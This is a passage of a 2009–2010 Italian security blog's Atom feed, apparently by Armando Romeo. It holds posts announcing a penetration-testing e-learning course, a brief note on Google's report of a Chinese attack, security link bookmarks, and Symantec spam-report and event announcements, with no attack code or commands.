&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-8775890946413336426?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QqPd336jz4ZRdEqVnH0Z6ir-TlQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QqPd336jz4ZRdEqVnH0Z6ir-TlQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QqPd336jz4ZRdEqVnH0Z6ir-TlQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QqPd336jz4ZRdEqVnH0Z6ir-TlQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=UradjtZhmgg:Ka1NbKYY2Sc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=UradjtZhmgg:Ka1NbKYY2Sc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=UradjtZhmgg:Ka1NbKYY2Sc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/UradjtZhmgg" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8775890946413336426?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8775890946413336426?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/UradjtZhmgg/norton-360-lacquasanta-recensita-dal.html" title="Norton 360 - L'acquasanta recensita dal diavolo - Parte 1" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_-FDKJTRMHR0/S6v5BElJbhI/AAAAAAAAAEA/6tHz4Af35mA/s72-c/av2.jpg" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2010/03/norton-360-lacquasanta-recensita-dal.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcFSHc_eip7ImA9WxBbFE4.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-4150651218612273770</id><published>2010-03-12T15:24:00.000-08:00</published><updated>2010-03-12T15:53:39.942-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-12T15:53:39.942-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="eLearnSecurity" /><title>Dove eravamo rimasti...</title><content type="html">Rieccomi,&lt;br /&gt;Dall'ultima volta che ho scritto su questo blog tante cose sono cambiate nel settore:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Abbiamo scoperto che non siamo più in grado di calcolare un perimetro, figuriamoci di proteggerlo (è il 2010 signori)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Le &lt;a href="http://www.cloudforum.org/"&gt;nuvole &lt;/a&gt;ci faranno risparmiare (finchè non decideremo di cambiare nuvola e allora lì si che saranno dolori)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;L'&lt;a href="http://en.wikipedia.org/wiki/Advanced_Persistent_Threat"&gt;APT&lt;/a&gt; è un nuova malattia da curare con l'ultimo tool di X&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Un po di &lt;a href="http://en.wikipedia.org/wiki/Fud"&gt;FUD&lt;/a&gt; e un po di nuovi acronimi da dare in pasto al reparto vendite e la crisi è alle spalle.&lt;br /&gt;&lt;br /&gt;Per quanto mi riguarda, sono stato colpevolmente lontano dallo scrivere sul blog a causa (o grazie?) del mio ultimo progetto :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.elearnsecurity.com"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 90px;" src="http://www.elearnsecurity.com/images/logo.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Vi risparmio una serie interminabile di termini cari ai venditori (che ho dovuto aimè imparare) per introdurvi in maniera diretta e concisa all'idea.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.elearnsecurity.com"&gt;eLearnSecurity &lt;/a&gt;è un azienda start-up (si ci metto faccia, soldi e quelle 4 cose che ho imparato) che ha come obiettivo quello di creare corsi avanzati di sicurezza informatica sfruttando le migliori tecnologie di e-learning.&lt;br /&gt;&lt;br /&gt;Il primo corso che andremo a lanciare entro (si spera) un paio di settimane sarà &lt;span style="font-weight: bold;"&gt;Penetration Testing Course - Professional&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Questo corso vede come autori:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Brett Arion&lt;/span&gt;&lt;br /&gt;Pluri certificato, responsabile della sicurezza di BlueCross SC, consigliere FBI e con oltre 15 anni di esperienza nel settore dell'ICT Security&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Autore della sezione Network Security Testing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Vipin and Nitin Kumar&lt;/span&gt;&lt;br /&gt;Con Johanna Rutkowska probabilmente i ricercatori più famosi nel settore della System Security. Il loro nome è legato al VBootkit, BIOS Rootkit per Windows Vista e Windows 7 presentato a Black Hat US 2009.&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Autori della sezione System Security&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Armando Romeo&lt;/span&gt;&lt;br /&gt;Sono io. Diciamo che ho svolto qualche decina di test per organizzazioni di grande dimensione. Sono autore della pubblicazione di oltre 100 security advisory.&lt;br /&gt;Trainer ma anche Manager in Security Brigade.&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Autore della sezione Web Application Testing&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Nei prossimi post vorrò parlarvi del perché della creazione di un corso di penetration test.&lt;br /&gt;&lt;br /&gt;Intanto potresete fare un antipasto con la &lt;a href="http://www.elearnsecurity.com/course/penetration_testing/preview/player.html"&gt;preview del nostro corso&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Alla prossima&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-4150651218612273770?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jtLx9DT4k9r7XYkOhQjUxBBfVt8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jtLx9DT4k9r7XYkOhQjUxBBfVt8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jtLx9DT4k9r7XYkOhQjUxBBfVt8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jtLx9DT4k9r7XYkOhQjUxBBfVt8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=2hc9jjAV6EY:I6AfzgnJpDk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2hc9jjAV6EY:I6AfzgnJpDk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=2hc9jjAV6EY:I6AfzgnJpDk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/2hc9jjAV6EY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/4150651218612273770?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/4150651218612273770?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/2hc9jjAV6EY/dove-eravamo-rimasti.html" title="Dove eravamo rimasti..." /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2010/03/dove-eravamo-rimasti.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YAQnc6eyp7ImA9WxBQE0k.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-8660594508127714560</id><published>2010-01-12T16:05:00.001-08:00</published><updated>2010-01-12T16:05:43.913-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-12T16:05:43.913-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="google cina" /><title>Google - Cina : un attacco informatico senza precedenti</title><content type="html">In un post rilasciato pochi minuti fa, che ha fatto il giro del mondo, Google annuncia 2 notizie clamorose:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Un attacco Cinese è riuscito nel furto di proprietà intellettuale di Google e di altre 20 tra le più grandi aziende americane&lt;/li&gt;&lt;li&gt;Google eliminerà ogni filtro e censura da Google.cn in virtù di questi attacchi a costo di dover chiudere le sue basi in Cina&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;Il post è &lt;a href="http://blogs.hackerscenter.com/2010/01/china-steals-googles-data.html"&gt;disponibile qui&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-8660594508127714560?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jqeDkBbdWmLZN__23GoZkw3OasY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jqeDkBbdWmLZN__23GoZkw3OasY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jqeDkBbdWmLZN__23GoZkw3OasY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jqeDkBbdWmLZN__23GoZkw3OasY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=QDMpms2M5aM:UrbHEYO0VF0:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=QDMpms2M5aM:UrbHEYO0VF0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=QDMpms2M5aM:UrbHEYO0VF0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/QDMpms2M5aM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8660594508127714560?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8660594508127714560?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/QDMpms2M5aM/google-cina-un-attacco-informatico.html" title="Google - Cina : un attacco informatico senza precedenti" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2010/01/google-cina-un-attacco-informatico.html</feedburner:origLink></entry><entry><title type="text">Links for 2009-12-30 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/gx9gXn03ozc/zinhohsc" /><updated>2009-12-31T00:00:00-08:00</updated><id>http://del.icio.us/zinhohsc#2009-12-30</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.owasp.org/index.php/Phoenix/Tools"&gt;Phoenix/Tools - OWASP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/gx9gXn03ozc" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2009-12-30</feedburner:origLink></entry><entry><title type="text">Links for 2009-10-27 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/mG1SHgcJiDM/zinhohsc" /><updated>2009-10-28T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2009-10-27</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf"&gt;Manipulating_SQL_Server_Using_SQL_Injection.pdf (Oggetto application/pdf)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/mG1SHgcJiDM" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2009-10-27</feedburner:origLink></entry><entry><title type="text">Links for 2009-10-12 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/C8ruJU58Ipo/zinhohsc" /><updated>2009-10-13T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2009-10-12</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://office.microsoft.com/it-it/sharepointdesigner/HA101005911040.aspx"&gt;Creazione di un flusso di lavoro - SharePoint Designer - Microsoft Office Online&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/C8ruJU58Ipo" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2009-10-12</feedburner:origLink></entry><entry><title type="text">Links for 2009-10-04 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/W8q-_26Rltw/zinhohsc" /><updated>2009-10-05T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2009-10-04</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/doctype/wiki/ArticleXSSInJavaScript"&gt;ArticleXSSInJavaScript - doctype - HOWTO filter user input in JavaScript context - Project Hosting on Google Code&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/W8q-_26Rltw" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2009-10-04</feedburner:origLink></entry><entry><title type="text">Links for 2009-09-01 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/2Bw6Jh7yic0/zinhohsc" /><updated>2009-09-02T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2009-09-01</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.easyvmx.com/easyvmx.shtml"&gt;EasyVMX!: Virtual Machine Creator&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/2Bw6Jh7yic0" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2009-09-01</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEEQ3Y8fyp7ImA9WxJQE04.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-6995517031023785080</id><published>2009-05-26T03:08:00.000-07:00</published><updated>2009-05-26T03:10:02.877-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-05-26T03:10:02.877-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="symantec" /><category scheme="http://www.blogger.com/atom/ns#" term="eventi" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Symantec Spam Report maggio 2009 - La febbre suina corre sul web</title><content type="html">Gli spammer, è noto, mangiano pane ed attualità ed è proprio dagli avvenimenti quotidiani che traggono la migliore ispirazione per lanciare sul web i loro virus contagiosi.&lt;br /&gt;Ed è così che la febbre suina da virus pandemico per l’uomo si trasforma in virus pandemico per PC. Infatti nella top 20 di maggio riguardante i subject di email spam il denominatore comune è proprio la febbre suina!&lt;br /&gt;&lt;br /&gt;Ma la paura umana di contrarre malattie non è il solo punto debole individuato dagli spammer, che hanno anche “giocato” con gli affetti colpendo la Festa della Mamma.&lt;br /&gt;&lt;br /&gt;E ancora una volta Obama e i suoi 100 primi giorni alla Casa Bianca…&lt;br /&gt;&lt;br /&gt;Sono solo, questi, degli esempi riportati dallo State of Spam Report di maggio rilasciato da Symantec, la ricerca mensile che mira ad offrire una panoramica generale sulle tendenze dello spam.&lt;br /&gt;&lt;br /&gt;Il report completo è scaricabile al seguente link:&lt;a href="http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_05-2009.en-us.pdf"&gt; http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_05-2009.en-us.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Maggiori informazioni ed approfondimenti in occasione del Symantec Technology Day Scenario 2009. Milano, Teatro Franco Parenti, 9 giugno 2009, ore 9.30.&lt;br /&gt;Per registrazione e maggiori infromazioni: &lt;a href="http://symantec.freedatalabs.com"&gt;http://symantec.freedatalabs.com&lt;/a&gt;&lt;br /&gt;Per inviare in anteprima domande ai relatori: &lt;a href="http://www.facebook.com/pages/Symantec-Technology-Day/74719484173"&gt;http://www.facebook.com/pages/Symantec-Technology-Day/74719484173&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-6995517031023785080?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JLys-1_o6LDrqlRBKAYRQroa19U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JLys-1_o6LDrqlRBKAYRQroa19U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JLys-1_o6LDrqlRBKAYRQroa19U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JLys-1_o6LDrqlRBKAYRQroa19U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=ROIG2klifkY:48xB-DCyw1o:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=ROIG2klifkY:48xB-DCyw1o:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=ROIG2klifkY:48xB-DCyw1o:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/ROIG2klifkY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6995517031023785080?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6995517031023785080?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/ROIG2klifkY/symantec-spam-report-maggio-2009-la.html" title="Symantec Spam Report maggio 2009 - La febbre suina corre sul web" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/05/symantec-spam-report-maggio-2009-la.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEABRH8zfyp7ImA9WxJRGU0.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-2611038802906377507</id><published>2009-05-21T03:37:00.000-07:00</published><updated>2009-05-21T03:45:55.187-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-05-21T03:45:55.187-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="eventi" /><title>Symantec Technology Day Scenario 2009</title><content type="html">Con grande piacere segnalo il seguente interessante evento:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Symantec Technology Day Scenario 2009 - Milano, 9 giugno 2009, Teatro Franco Parenti.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Sale sul palco del Teatro Parenti di Milano SCENARIO, l'evento dell'anno targato SYMANTEC. Nella mattinata, condotta da Beppe Severgnini, sarà presentata una panoramica sulla situazione attuale e sulle previsioni future del business. E di seguito la proposta Symantec in tema di storage, security, availability e data management. Il pomeriggio sarà dedicato a tre sessioni parallele per affrontare dal punto di vista tecnico e del ROI i temi proposti.&lt;br /&gt;&lt;br /&gt;Maggiori informazioni e registrazione:&lt;br /&gt;&lt;br /&gt;:: Symantec: &lt;a href="http://symantec.freedatalabs.com/"&gt;http://symantec.freedatalabs.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;:: Facebook: invia in anteprima le tue domande ai relatori e scopri tutto sugli eventi e le pubblicazioni symantec &lt;a 